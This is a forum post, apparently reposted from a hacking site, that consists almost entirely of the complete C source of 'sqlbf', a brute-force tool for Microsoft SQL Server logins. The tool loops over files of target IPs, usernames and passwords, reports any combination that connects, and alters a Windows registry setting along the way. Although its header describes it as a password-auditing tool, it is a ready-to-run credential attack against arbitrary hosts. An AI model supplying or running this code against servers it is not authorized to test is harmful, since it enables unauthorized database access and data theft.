Gabriel87 Posted July 19, 2011 Report Posted July 19, 2011 /* sqlbf - MSSQL server brute force tool by xaphan (xaphan@hushmail.com) This is a tool for auditing the strength of your SQL login passwords. Usage: sqlbf [ODBC NetLib] [IP List] [User list] [Password List] ODBC NetLib : T - TCP/IP, P - Named Pipes (netBIOS) IP list - text file containing list of IPs to audit User list - text file containing list of Usernames Password List - text file containing list of passwords I don't do much error checking, so don't screw up.*/#include "stdafx.h"int sqlpoke(char *constr){ SQLHENV henv = SQL_NULL_HENV; SQLHDBC hdbc1 = SQL_NULL_HDBC; SQLHSTMT hstmt1 = SQL_NULL_HSTMT; RETCODE retcode; SQLCHAR szOutConn[1024], sqlstate[6], errmsg[SQL_MAX_MESSAGE_LENGTH]; SQLSMALLINT szint, msglen; SQLINTEGER nativeerr; int count=0, l = 0, p = 0; retcode = SQLAllocHandle (SQL_HANDLE_ENV, NULL, &henv); retcode = SQLSetEnvAttr(henv, SQL_ATTR_ODBC_VERSION, (SQLPOINTER) SQL_OV_ODBC3, SQL_IS_INTEGER); retcode = SQLAllocHandle(SQL_HANDLE_DBC, henv, &hdbc1); retcode = SQLDriverConnect(hdbc1, NULL, (SQLTCHAR*)constr, SQL_NTS, szOutConn, 1024, &szint, SQL_DRIVER_NOPROMPT); if (retcode == SQL_ERROR) { // 28000 == bad user/pass if ( SQLGetDiagRec(SQL_HANDLE_DBC, hdbc1, 1, sqlstate, &nativeerr, errmsg, sizeof(errmsg), &msglen) != SQL_ERROR) { if ( strcmp((char *)sqlstate, "28000") == 0) { //try again SQLFreeHandle(SQL_HANDLE_DBC, hdbc1); SQLFreeHandle(SQL_HANDLE_ENV, henv); return 0; } // dont bother trying again SQLFreeHandle(SQL_HANDLE_DBC, hdbc1); SQLFreeHandle(SQL_HANDLE_ENV, henv); return -1; } } SQLDisconnect(hdbc1); SQLFreeHandle(SQL_HANDLE_DBC, hdbc1); SQLFreeHandle(SQL_HANDLE_ENV, henv); // successful connect return 1;}void usage(){ printf("\nUsage:\tsqlbf [ODBC NetLib] [IP List] [User list] [Password List]\n\n"); printf("\t\tODBC NetLib : T - TCP/IP, P - Named Pipes (netBIOS)\n\n"); return;}int main(int argc, char* argv[]){ char *data, ip[20], username[20], password[20], constr[1024]; int mode, c = 0, err; HKEY hReg; DWORD type, so_data; FILE *ips, *users, *pwds; if (argc != 5) { usage(); return 0; } if ( strcmp(argv[1], "P") == 0 ) mode = 0; else mode = 1; //open IP list if ( (ips = fopen(argv[2], "rt")) == NULL) { printf("Error opening IP list.\n"); return 0; } //open user list if ( (users = fopen(argv[3], "rt")) == NULL) { printf("Error opening user list.\n"); return 0; } //open pwd list if ( (pwds = fopen(argv[4], "rt")) == NULL) { printf("Error opening password list.\n"); return 0; } data = (char *)malloc(64); // set the default client lib if ( RegOpenKeyEx ( HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\MSSQLServer\\Client\\ConnectTo", 0, KEY_ALL_ACCESS, &hReg) == ERROR_SUCCESS) { //store previous value if ( RegQueryValueEx(hReg, "DSQUERY", NULL, &type, (unsigned char *)data, &so_data) != ERROR_SUCCESS) { printf("Unable to store SQL Library value.\n"); free(data); return 0; } switch (mode ) { case 0: // Named Pipes so_data = strlen("DBNMPNTW") + 1; err = RegSetValueEx(hReg, "DSQUERY",0, REG_SZ , (unsigned char *)"DBNMPNTW", so_data); break; case 1: // TCP/IP so_data = strlen("DBMSSOCN") + 1; err = RegSetValueEx(hReg, "DSQUERY",0, REG_SZ , (unsigned char *)"DBMSSOCN", so_data); break; } if (err != 0) { printf("Error Setting SQL Network Library.\n"); free(data); return 0; } } while (!feof(ips)) { //read IP from stream fgets(ip, 20, ips); while (ip[c] != '\0') { if (ip[c] == '\n') ip[c] = '\0'; c++; } c = 0; while (!feof(users)) { //read username from stream fgets(username, 20, users); while (username[c] != '\0') { if (username[c] == '\n') username[c] = '\0'; c++; } c = 0; while (!feof(pwds)) { //read a password from pwd stream fgets(password, 20, pwds); while (password[c] != '\0') { if (password[c] == '\n') password[c] = '\0'; c++; } c = 0; //build connection stream based on mode if (mode == 0) { sprintf(constr, "%s%s%s%s%s%s%s", "DRIVER={SQL Server};SERVER=", ip, "," , ";UID=", username,";PWD=", password); } else { //the port should be set by the user or in an ini, but I'm lazy sprintf(constr, "%s%s%s%d%s%s%s%s", "DRIVER={SQL Server};SERVER=", ip, ",", 1433, ";UID=", username,";PWD=", password); } //call sqlpoke err = sqlpoke(constr); if ( err == 1) { printf("\nConnected to %s with username \'%s\' and password \'%s\'\n", ip, username, password); break; } else if (err == -1) { //Bail out of this IP printf("\nError - unable to connect to SQL server on %s.\n", ip); fseek(pwds, 0, SEEK_SET); fseek(users, 0, SEEK_SET); goto next; // Mmmm... a goto } printf("."); } fseek(pwds, 0, SEEK_SET); } fseek(users, 0, SEEK_SET);next:; } so_data = strlen(data) + 1; err = RegSetValueEx(hReg, "DSQUERY",0, REG_SZ , (unsigned char *)data, so_data); if (err != 0) printf("Error resetting the SQL network library.\n"); free(data); RegCloseKey(hReg); printf("\nFin.\n"); return 0;}Sursa : Hackhound Quote
